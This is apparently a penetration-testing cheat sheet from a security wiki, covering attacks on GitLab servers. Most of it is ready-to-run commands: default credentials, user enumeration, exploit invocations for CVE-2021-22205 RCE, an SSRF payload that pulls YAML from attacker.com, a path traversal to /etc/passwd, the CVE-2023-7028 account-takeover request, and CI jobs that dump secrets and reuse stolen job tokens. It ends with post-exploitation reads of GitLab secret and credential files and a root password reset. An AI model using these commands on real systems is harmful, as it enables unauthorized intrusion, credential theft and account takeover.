GitLab

GitLab security testing - enumeration, common vulnerabilities, and exploitation techniques.

Default Credentials

Username: root
Password: 5iveL!fe

Username: admin  
Password: 5iveL!fe

# Note: GitLab 14.0+ forces password change on first login

Enumeration

Public Information

# Check for public projects (even on private instances)
https://gitlab.target.com/explore
https://gitlab.target.com/explore/projects
https://gitlab.target.com/explore/groups
https://gitlab.target.com/explore/snippets

# Search for sensitive content
# Use searchbar for: password, secret, key, token, api_key, credentials

# API endpoints (may leak version info)
https://gitlab.target.com/api/v4/version
https://gitlab.target.com/api/v4/projects
https://gitlab.target.com/api/v4/users

User Enumeration

# Enumerate users via API
curl https://gitlab.target.com/api/v4/users

# Check user profiles
https://gitlab.target.com/users/admin
https://gitlab.target.com/admin

# Enumerate via response differences
# Valid user: 200 OK with profile
# Invalid user: 404 Not Found

Version Detection

# Check version (if exposed)
curl https://gitlab.target.com/api/v4/version
curl https://gitlab.target.com/help

# Fingerprint via assets
# Compare JS/CSS hashes with known versions

Common Vulnerabilities

CVE-2021-22205 (RCE via Image Upload) - Critical

# Affects GitLab CE/EE < 13.10.3, < 13.9.6, < 13.8.8
# Unauthenticated RCE via malicious image in exiftool

# Check if vulnerable
curl -s https://gitlab.target.com/users/sign_in | grep -oP 'gitlab_version.*?(\d+\.\d+\.\d+)'

# Exploit - https://github.com/AhmedMohamedDev/CVE-2021-22205
python3 exploit.py -t https://gitlab.target.com -c "id"

CVE-2021-22214 (SSRF)

# Affects GitLab CE/EE 10.5 to 13.10.4
# SSRF via CI lint API

curl -X POST "https://gitlab.target.com/api/v4/ci/lint" \
  -H "Content-Type: application/json" \
  -d '{"content": "include:\n  remote: http://attacker.com/evil.yml"}'

CVE-2023-2825 (Path Traversal)

# Affects GitLab CE/EE 16.0
# Unauthenticated path traversal to read files

curl "https://gitlab.target.com/uploads/-/system/personal_snippet/1/secret/../../../../../../../../etc/passwd"

CVE-2023-7028 (Account Takeover)

# Affects GitLab CE/EE < 16.5.6, < 16.6.4, < 16.7.2
# Password reset to attacker-controlled email

# Exploit via duplicate email parameter
POST /users/password HTTP/1.1
user[email][email protected]&user[email][email protected]

CI/CD Pipeline Exploitation

Secrets in CI Variables

# .gitlab-ci.yml - Check for exposed secrets
# Variables often visible in job logs if not masked

script:
  - echo $CI_JOB_TOKEN  # May have repo access
  - echo $PRIVATE_TOKEN  # If misconfigured
  - printenv  # Dump all variables

Token Abuse

# CI_JOB_TOKEN has temporary access to:
# - Clone repositories in the same group
# - Push to container registry
# - Access package registry

# Use stolen CI_JOB_TOKEN
git clone https://gitlab-ci-token:${CI_JOB_TOKEN}@gitlab.target.com/group/repo.git

# Access container registry
docker login -u gitlab-ci-token -p ${CI_JOB_TOKEN} registry.gitlab.target.com

Runner Exploitation

# If you can modify .gitlab-ci.yml in any repo:
# 1. Shared runners may access other project secrets
# 2. Shell executors run as gitlab-runner user
# 3. Docker executors may allow container escape

# Malicious CI job
stages:
  - exploit

exploit:
  stage: exploit
  script:
    - cat /etc/passwd
    - env
    - ls -la /home/gitlab-runner/

GraphQL API Testing

# Introspection query
curl -X POST https://gitlab.target.com/api/graphql \
  -H "Content-Type: application/json" \
  -d '{"query": "{ __schema { types { name } } }"}'

# Query current user
curl -X POST https://gitlab.target.com/api/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer TOKEN" \
  -d '{"query": "{ currentUser { username email } }"}'

Post-Exploitation

# If you have access to GitLab server:

# Database credentials
cat /etc/gitlab/gitlab.rb | grep -i password
cat /var/opt/gitlab/gitlab-rails/etc/database.yml

# Secrets file (for cookie signing, etc.)
cat /etc/gitlab/gitlab-secrets.json

# Rails console (as root)
gitlab-rails console
# Then: User.find_by(username: 'root').password = 'newpassword'

# Backup (contains all data)
ls /var/opt/gitlab/backups/

Tools

# GitLab enumeration
# https://github.com/AhmedMohamedDev/gitlab-enum
python3 gitlab_enum.py -t https://gitlab.target.com

# CI/CD exploitation
# https://github.com/AhmedMohamedDev/nord-stream
nord-stream -t gitlab -u https://gitlab.target.com -token TOKEN

# General
nuclei -t http/cves/2021/CVE-2021-22205.yaml -u https://gitlab.target.com

CI/CD Security - Pipeline attacks
SSRF - GitLab SSRF vulnerabilities
Supply Chain - Code repository attacks

PreviousGitHub NextWAFs

Last updated 8 days ago

Was this helpful?

hashtagDefault Credentials

hashtagEnumeration

hashtagPublic Information

hashtagUser Enumeration

hashtagVersion Detection

hashtagCommon Vulnerabilities

hashtagCVE-2021-22205 (RCE via Image Upload) - Critical

hashtagCVE-2021-22214 (SSRF)

hashtagCVE-2023-2825 (Path Traversal)

hashtagCVE-2023-7028 (Account Takeover)

hashtagCI/CD Pipeline Exploitation

hashtagSecrets in CI Variables

hashtagToken Abuse

hashtagRunner Exploitation

hashtagGraphQL API Testing

hashtagPost-Exploitation

hashtagTools

hashtagRelated Topics

Default Credentials

Enumeration

Public Information

User Enumeration

Version Detection

Common Vulnerabilities

CVE-2021-22205 (RCE via Image Upload) - Critical

CVE-2021-22214 (SSRF)

CVE-2023-2825 (Path Traversal)

CVE-2023-7028 (Account Takeover)

CI/CD Pipeline Exploitation

Secrets in CI Variables

Token Abuse

Runner Exploitation

GraphQL API Testing

Post-Exploitation

Tools

Related Topics